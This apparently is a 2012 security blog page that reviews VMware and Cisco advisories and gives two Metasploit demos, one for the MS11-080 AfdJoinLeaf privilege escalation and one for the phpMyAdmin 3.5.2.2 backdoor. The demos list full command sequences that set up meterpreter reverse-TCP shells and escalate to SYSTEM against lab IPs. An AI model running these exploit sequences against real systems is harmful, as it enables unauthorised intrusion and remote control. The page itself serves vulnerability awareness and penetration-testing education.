VMware Security Advisory VMSA-2012-0014 Review

Vulnerability Management

VMware has release,the 04 October 2012, one security advisory VMSA-2012-0014 concerning VMware vCenter Operation, vCenter CapacityIQ and Movie Decoder.

VMware Movie Decoder Installer binary planting vulnerability

VMware Movie Decoder is affected by one vulnerability, CVE-2012-4897, with a 6.9 CVSS base score. The vulnerability was discovered and reported by Mitja Kolsek of ACROS Security. Movie Decoder previous to version 9.0 are affected.

vCenter Operations cross-site scripting vulnerability

vCenter Operations is affected by a XSS vulnerability, CVE-2012-5050, with a 4.3 CVSS base score. The vulnerability was discovered and reported by Alexander Minozhenko of ERPScan. vCOps previous to version 5.0.x are affected.

vCenter CapacityIQ path traversal vulnerability

vCenter CapacityIQ is affected by a path traversal vulnerability, CVE-2012-5051, with a 5.0 CVSS base score. The vulnerability was discovered and reported by Alexander Minozhenko of ERPScan. CapacityIQ previous to vCOps 5.0.x are affected.

MS11-080 Microsoft Windows AfdJoinLeaf Privilege Escalation Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability reported to Microsoft by Bo Zhou
Coordinated public release of the vulnerability the 2011-10-11
Metasploit PoC provided the 2012-10-02

PoC provided by :

Bo Zhou
Matteo Memelli
Spencer McIntyre

Reference(s) :

MS11-080
CVE-2011-2005

Affected version(s) :

Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2

Tested on Windows XP Pro SP3 with :

N/A

Description :

This module exploits a flaw in the AfdJoinLeaf function of the afd.sys driver to overwrite data in kernel space. An address within the HalDispatchTable is overwritten and when triggered with a call to NtQueryIntervalProfile will execute shellcode. This module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process before restoring it’s own token to avoid causing system instability.

Commands :

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit -j

session -i 1
getuid
sysinfo
background

use exploit/windows/local/ms11_080_afdjoinleaf
set SESSION 1
exploit

session -i 2
sysinfo
getuid

Cisco September 2012 Security Advisory Bundle Review

Vulnerability Management

Cisco has release, the 26 September 2012, during his bi-annual Security Advisory Bundle, 9 security bulletins dealing with 8 vulnerabilities. Eight of the advisories address vulnerabilities in Cisco IOS Software, and one advisory addresses a vulnerability in Cisco Unified Communications Manager.

cisco-sa-20120926-bgp – Cisco IOS Software Malformed Border Gateway Protocol Attribute Vulnerability

cisco-sa-20120926-bgp is concerning Cisco IOS, IOS-XR and Cisco IOS-XE Softwares how contains a vulnerability in the Border Gateway Protocol (BGP) routing protocol feature. Repeated exploitation of the vulnerability could lead to inability to route packets to BGP neighbors during reconvergence times.

The vulnerability is identified as CVE-2012-4617, with a CVSS base score of 7.1, and was internally discovered by Cisco during testing.

cisco-sa-20120926-ios-ips – Cisco IOS Software Intrusion Prevention System Denial of Service Vulnerability

cisco-sa-20120926-ios-ips is concerning Intrusion Prevention System (IPS) feature present in Cisco IOS Software. An unauthenticated, remote attacker could cause a reload of an affected device.

The vulnerability is identified as CVE-2012-3950, with a CVSS base score of 7.8, and was discovered when handling customer support requests.

cisco-sa-20120926-nat – Cisco IOS Software Network Address Translation Vulnerabilities

cisco-sa-20120926-nat is concerning Cisco IOS Software Network Address Translation (NAT) how contains two denial of service (DoS) vulnerabilities.

CVE-2012-4618 and CVE-2012-4619 vulnerabilities have both a CVSS base score of 7.8, and were discovered during troubleshooting of TAC service requests.

cisco-sa-20120926-c10k-tunnels – Cisco IOS Software Tunneled Traffic Queue Wedge Vulnerability

cisco-sa-20120926-c10k-tunnels is concerning Cisco IOS Software on Cisco 10000 Series router how contains a vulnerability when processing IP tunneled packets. This vulnerability could lead to denial of service (DoS).

The vulnerability is identified as CVE-2012-4620, with a CVSS base score of 7.8, and was discovered during troubleshooting of a customer issue.

cisco-sa-20120926-dhcpv6 – Cisco IOS Software DHCP Version 6 Server Denial of Service Vulnerability

cisco-sa-20120926-dhcpv6 is concerning Cisco IOS Software and Cisco IOS XE Software how contain a vulnerability how could lead to denial of service (DoS).

The vulnerability is identified as CVE-2012-4623, with a CVSS base score of 7.1, and was discovered by Cisco during internal testing.

cisco-sa-20120926-ecc – Cisco Catalyst 4500E Series Switch with Cisco Catalyst Supervisor Engine 7L-E Denial of Service Vulnerability

cisco-sa-20120926-ecc is concerning Catalyst 4500E series switch with Supervisor Engine 7L-E how contain a vulnerability how could lead to denial of service (DoS).

The vulnerability is identified as CVE-2012-4622, with a CVSS base score of 7.8, and was discovered when handling customer service requests.

cisco-sa-20120926-dhcp – Cisco IOS Software DHCP Denial of Service Vulnerability

cisco-sa-20120926-dhcp is concerning Cisco IOS Software how contain a vulnerability how could lead to denial of service (DoS).

The vulnerability is identified as CVE-2012-4621, with a CVSS base score of 7.8, and was discovered during the troubleshooting of customer service requests.

cisco-sa-20120926-cucm – Cisco Unified Communications Manager Session Initiation Protocol Denial of Service Vulnerability

cisco-sa-20120926-cucm is concerning Cisco Unified Communications Manager how contains a vulnerability in its Session Initiation Protocol (SIP) implementation. This vulnerability could lead to denial of service (DoS).

The vulnerability is identified as CVE-2012-3949, with a CVSS base score of 7.8, and was discovered during troubleshooting of TAC service requests.

cisco-sa-20120926-sip – Cisco IOS Software Session Initiation Protocol Denial of Service Vulnerability

cisco-sa-20120926-sip is concerning Cisco IOS Software and Cisco IOS XE Software how contains a vulnerability in there Session Initiation Protocol (SIP) implementation. This vulnerability could lead to denial of service (DoS).

The vulnerability is identified as CVE-2012-3949, with a CVSS base score of 7.8, and was discovered during troubleshooting of TAC service requests.

CVE-2012-5159 phpMyAdmin 3.5.2.2 server_sync.php Backdoor Metasploit Demo

Exploits, Metasploit

Timeline :

Backdoor discovered by Passerby the 2012-09-25
Backdoor presence vendor notification the 2012-09-25
Metasploit PoC provided the 2012-09-25

PoC provided by :

hdm

Reference(s) :

PMASA-2012-5
CVE-2012-5159
BID-51211

Affected version(s) :

phpMyAdmin-3.5.2.2-all-languages.zip downloaded from cdnetworks-kr-1 SourceForget.net mirror.

Tested on Ubuntu 11.10 i386 with :

phpMyAdmin-3.5.2.2-all-languages.zip

Description :

This module exploits an arbitrary code execution backdoor placed into phpMyAdmin v3.5.2.2 thorugh a compromised SourceForge mirror.

Commands :

use exploit/multi/http/phpmyadmin_3522_backdoor
set RHOST 192.168.178.40
set PATH /phpMyAdmin-3.5.2.2-all-languages
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit

sysinfo
getuid